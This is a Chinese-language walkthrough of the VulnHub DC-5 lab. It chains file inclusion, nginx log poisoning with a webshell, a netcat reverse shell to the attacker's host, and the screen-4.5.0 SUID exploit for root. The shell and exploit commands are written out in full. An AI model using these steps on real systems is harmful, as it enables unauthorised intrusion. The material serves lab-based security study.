image-20230923193820942

靶场搭建

靶场名称: DC-5
靶场地址:https://www.vulnhub.com/entry/dc-5,314/
攻击机:kali

信息收集

在kail使用arp-scan -l或者nmap -sP 192.168.121.0/24搜索靶场的IP
image.png
凭借经验猜测IP,使用ping命令对其分别进行验证
成功获取靶场IP:192.168.121.135
使用nmap对其进行端口扫描:namp -sV 192.168.121.135
image.png
获取到了靶场开放的端口80(wed服务)和服务器中间件nginx信息

文件包含

使用浏览器进行访问

image.png

发现一个留言wed页面,对其进行检测没有发现sql,xss等漏洞

image.png

不过在留言提交过后,发现页脚每次刷新一下都在变化,可能存在文件包含
image.png

漏洞利用

使用御剑对其进行后台扫描
image.png

分别对其进行访问,发现一个页脚图标footer.php(文件包含的文件)

image.png

使用file协议判断一下是否可以读取到/etc/passwd

file=/etc/passwd

image.png

成功读取
得到漏洞,利用漏洞,因为刚刚在收集信息中得知了服务器中间件是nginx可以对其进行利用
尝试是否可以读取nginx的日志文件

file=/var/log/nginx/error.log

image.png

读取成功,nginx的日志是记录错误信息的,方便排错的,可以对其进行利用
利用:
使用file读取一个不存在的文件让它报错,让nginx记录(原理)
file读取一句话木马报错后被记录,使用蚁剑去连接服务器
为了防止一句话木马在传参过程中被url编码,使用Burp工具进行操作

image.png

image.png

使用蚁剑连接

image.png

成功拿下服务器

image.png

提权

nc -lnvp 6666

image.png

nc -e /bin/bash 192.168.121.130 6666

image.png

使用脚本进入交互界面

python -c 'import pty;pty;pty.spawn("/bin/bash")'

image.png

查找具有root权限的命令

find / -user root -perm -4000 -print 2>/dev/null

image.png

搜索screen-4.5.0利用提权

image.png

将screen-4.5.0复制到攻击机

searchsploit -m screen 4.5.0

image.png

查看41154.sh文件,将它分别

image.png

# libhax.c运行生成libhax.so
  gcc -fPIC -shared -ldl -o libhax.so libhax.c7u7

image.png

gcc -o rootshell rootshell.c

image.png

申明:

本博客所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.